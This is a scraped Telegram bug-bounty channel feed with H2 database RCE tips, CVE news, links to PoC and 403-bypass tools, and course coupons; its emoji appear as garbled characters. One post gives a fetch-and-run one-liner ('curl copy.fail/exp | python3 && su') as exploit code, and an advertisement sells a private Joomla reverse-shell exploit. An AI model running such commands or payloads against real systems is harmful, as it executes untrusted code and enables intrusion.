Hey Hunter's,
DarkShadow is here back again!
π¨ Import schema from H2 Database β RCE via EXEC Alias β‘
Creating an alias to execute system commands via Java Runtime
π Quick Analysis:
ο»Ώ
π§ Bug Bounty Tips:
So guys if you really enjoy to read such methods show your love β€οΈ
#bugbountytips #rce
DarkShadow is here back again!
π¨ Import schema from H2 Database β RCE via EXEC Alias β‘
Creating an alias to execute system commands via Java Runtime
π Quick Analysis:
- Default oken validation
- H2 database exposed with unsafe configurations
- Ability to create custom ALIAS β leads to RCE
- No proper input validation or restriction on JDBC params
ο»Ώ
π§ Bug Bounty Tips:
- Always check hidden/internal endpoints like "/getSchema", "/actuator", "/env"
- Look for H2 / embedded DB usage β often misconfigured
- Try injecting JDBC params (INIT, TRACE, etc.)
- Donβt ignore default tokens or exposed headers
- Think beyond SQLi β DB features themselves can be weaponized
So guys if you really enjoy to read such methods show your love β€οΈ
#bugbountytips #rce
β€7π±5
π₯ Ultimate Bug Bounty Goldmine β 1000+ Real Writeups
XSS, CSRF, SSRF, IDOR, SQLi, RCE⦠everything in one place.
Real reports from Google, Facebook, PayPal, Microsoft & more.
Perfect for learning real-world exploitation, not just theory.
GitHub: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
XSS, CSRF, SSRF, IDOR, SQLi, RCE⦠everything in one place.
Real reports from Google, Facebook, PayPal, Microsoft & more.
Perfect for learning real-world exploitation, not just theory.
GitHub: https://github.com/devanshbatham/Awesome-Bugbounty-Writeups
GitHub
GitHub - devanshbatham/Awesome-Bugbounty-Writeups: A curated list of bugbounty writeups (Bug type wise) , inspired from https:β¦
A curated list of bugbounty writeups (Bug type wise) , inspired from https://github.com/ngalongc/bug-bounty-reference - devanshbatham/Awesome-Bugbounty-Writeups
β€5π₯4
Source : https://github.com/securitycipher/awsome-websecurity-checklist/blob/main/Mindmaps/S3-Bucket%20Recon.png
Please open Telegram to view this post
VIEW IN TELEGRAM
β€6π3
π Free Coupons for the New Learners https://topmate.io/saumadip/2054509?coupon_code=awxe
topmate.io
Web Application Bug Bounty Methodology with Saumadip Mandal
Pro hacker's playbook: recon, XSS, SQLi, SSRF & more
β€3π₯1
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - mrmtwoj/apache-vulnerability-testing: Apache HTTP Server Vulnerability Testing Tool | PoC for CVE-2024-38472 , CVE-2024β¦
Apache HTTP Server Vulnerability Testing Tool | PoC for CVE-2024-38472 , CVE-2024-39573 , CVE-2024-38477 , CVE-2024-38476 , CVE-2024-38475 , CVE-2024-38474 , CVE-2024-38473 , CVE-2023-38709 - mrmt...
β€7π1
π¦ CloudFox helps you gain situational awareness in unfamiliar cloud environments. Itβs an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.
https://github.com/BishopFox/cloudfox
https://github.com/BishopFox/cloudfox
β€8π3π₯3
Getting very very good responses on the Web Application Bug Bounty Methodology pdf book. Thanks Everyone for the support !
Here is 10 coupons who want to grab it for free -- https://topmate.io/saumadip/2054509?coupon_code=qwerty
Here is 10 coupons who want to grab it for free -- https://topmate.io/saumadip/2054509?coupon_code=qwerty
β€4π₯2
Brut Security
Getting very very good responses on the Web Application Bug Bounty Methodology pdf book. Thanks Everyone for the support ! Here is 10 coupons who want to grab it for free -- https://topmate.io/saumadip/2054509?coupon_code=qwerty
Please open Telegram to view this post
VIEW IN TELEGRAM
1β€8π₯1π1
Reconnaissance- Phase1.pdf
1.5 MB
Please open Telegram to view this post
VIEW IN TELEGRAM
β€9π₯4π¨βπ»1
π₯ GitHub RCE via single git push!
CVE-2026-3854: Unsanitized push options let attackers run commands on backend servers, bypassing sandboxing (cross-tenant risk).
π Learn how header injection led to full compromise β https://thehackernews.com/2026/04/researchers-discover-critical-github.html?m=1
CVE-2026-3854: Unsanitized push options let attackers run commands on backend servers, bypassing sandboxing (cross-tenant risk).
π Learn how header injection led to full compromise β https://thehackernews.com/2026/04/researchers-discover-critical-github.html?m=1
π₯8π6β€4
This media is not supported in your browser
VIEW IN TELEGRAM
Hey Hunter's,
DarkShadow is here back again!
π¨History Breaking exploitπ³
CVE-2026-31431 (nickname: copy fail)
A Linux Privilege Escalation in all the major OS, hidden in the kernel for 9 years and discovered by an Ai !!!
Exploit code:
Guys, AI is going to be very dangerousπ¨
Don't forget to follow me x.com/darkshadow2bd
#exploit #bugbountytips #linux
DarkShadow is here back again!
π¨History Breaking exploitπ³
CVE-2026-31431 (nickname: copy fail)
A Linux Privilege Escalation in all the major OS, hidden in the kernel for 9 years and discovered by an Ai !!!
Exploit code:
curl copy.fail/exp | python3 && su
Guys, AI is going to be very dangerousπ¨
Don't forget to follow me x.com/darkshadow2bd
#exploit #bugbountytips #linux
β€7π₯4π2
Behind every secure system,
thereβs someone putting in the work no one sees.
Late nights, constant learning, silent defense.
This Labour Day, we salute every ethical hacker, analyst, and learner building a safer digital world.
Respect the grind.
Happy Labour Day.
#LabourDay #CyberSecurity #EthicalHacking #BrutSecurity
thereβs someone putting in the work no one sees.
Late nights, constant learning, silent defense.
This Labour Day, we salute every ethical hacker, analyst, and learner building a safer digital world.
Respect the grind.
Happy Labour Day.
#LabourDay #CyberSecurity #EthicalHacking #BrutSecurity
β€7π₯4π1
This media is not supported in your browser
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
1β€19
It helps us reach more people and keeps us motivated to share better content.
Please open Telegram to view this post
VIEW IN TELEGRAM
β€10π₯8
π¨ cPanelSniper β CVE-2026-41940
cPanel & WHM'de CVSS 10.0 kritik auth bypass.
CRLF injection β session file poisoning β root WHM access.
https://github.com/ynsmroztas/cPanelSniper
cPanel & WHM'de CVSS 10.0 kritik auth bypass.
CRLF injection β session file poisoning β root WHM access.
https://github.com/ynsmroztas/cPanelSniper
β€16π3
This media is not supported in your browser
VIEW IN TELEGRAM
π₯ JOOMLA PRO EXPLOIT v2026 π₯
The best private Joomla exploit injects an immediate reverse shell on all versions.
β SVG upload + rename to .php (total bypass)
β Automatic bypass of WAF and Cloudflare
β Automatic fallback via installTemplate (remote ZIP)
β 50 threads β scans 5+ directories and subpaths in seconds
β Updated with newly discovered CVE-2026
π Unique Feature:
Automatically detects CSRF token
Tests 15 upload directories (webroot, admin, images, tmp, etc.)
DM π @Mm_fitπ¦
π LAST 3 SPOTS AVAILABLE!
Channel: https://t.me/cve0day
The best private Joomla exploit injects an immediate reverse shell on all versions.
β SVG upload + rename to .php (total bypass)
β Automatic bypass of WAF and Cloudflare
β Automatic fallback via installTemplate (remote ZIP)
β 50 threads β scans 5+ directories and subpaths in seconds
β Updated with newly discovered CVE-2026
π Unique Feature:
Automatically detects CSRF token
Tests 15 upload directories (webroot, admin, images, tmp, etc.)
DM π @Mm_fit
π LAST 3 SPOTS AVAILABLE!
Channel: https://t.me/cve0day
#AD
Please open Telegram to view this post
VIEW IN TELEGRAM
β€7
bypass-403 β https://github.com/iamj0ker/bypass-403
nomore403 β https://github.com/devploit/nomore403
4-ZERO-3 β https://github.com/Dheerajmadhukar/4-ZERO-3
byp4xx β https://github.com/lobuhi/byp4xx
dontgo403 β https://github.com/mbrg/dontgo403
Please open Telegram to view this post
VIEW IN TELEGRAM
β€15π2π¨βπ»2
1600+ tested regex patterns for detecting secrets, API keys, passwords, and tokens
β’ Works with TruffleHog and Gitleaks
β’ ReDoS-safe patterns
β’ Confidence-based categorization
Limited regex coverage = missed secrets
https://github.com/mazen160/secrets-patterns-db
#AppSec #DevSecOps #BugBounty
β’ Works with TruffleHog and Gitleaks
β’ ReDoS-safe patterns
β’ Confidence-based categorization
Limited regex coverage = missed secrets
https://github.com/mazen160/secrets-patterns-db
#AppSec #DevSecOps #BugBounty
GitHub
GitHub - mazen160/secrets-patterns-db: Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwordsβ¦
Secrets Patterns DB: The largest open-source Database for detecting secrets, API keys, passwords, tokens, and more. - mazen160/secrets-patterns-db
π9π2πΏ1